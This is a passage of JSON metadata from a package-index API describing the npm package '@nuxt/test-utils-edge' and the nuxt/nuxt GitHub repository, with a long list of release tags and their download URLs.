tem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096127,"name":"@nuxt/test-utils-edge","ecosystem":"npm","description":"[![Nuxt banner](./.github/assets/banner.svg)](https://nuxt.com)","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1470,"first_release_published_at":"2022-02-11T14:37:10.243Z","latest_release_published_at":"2023-03-07T21:15:17.785Z","latest_release_number":"4.0.0-27970394.60d07df4","last_synced_at":"2026-05-11T01:23:26.544Z","created_at":"2022-04-08T10:39:33.329Z","updated_at":"2026-05-11T01:23:26.544Z","registry_url":"https://www.npmjs.com/package/@nuxt/test-utils-edge","install_command":"npm install @nuxt/test-utils-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.8.0-28284309.b3d3d7f4","pr-20836":"3.6.0-28072625.2e2d8450","pr-20910":"3.5.1-28071980.657d1b01","pr-21066":"3.5.2-28084070.1bb05d83","pr-21450":"3.6.0-28124217.43844474","pr-19403":"3.6.0-28106934.bccf6dd0","pr-21461":"3.6.0-28107353.3fa5f90a","pr-21655":"3.6.0-28121506.bee3dde2","pr-21573":"3.6.0-28121201.45550c5f","pr-21705":"3.6.0-28125223.60c7ae2d","pr-21793":"3.6.3-28155682.16a8312f","pr-22224":"3.7.0-28163062.f38eafa6","pr-22227":"3.6.5-28163125.3d0d7508","pr-21747":"3.7.0-28179135.c12f0f09","pr-22362":"3.7.0-28179877.ea6d5c28","pr-21641":"3.8.0-28246590.5d47cf10","pr-22465":"3.7.0-28184377.9a30357e","pr-22494":"3.7.0-28185860.e8cb8914","pr-22515":"3.7.0-28197383.e0d6624f","pr-23526":"3.8.0-28275051.7cb8d079"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v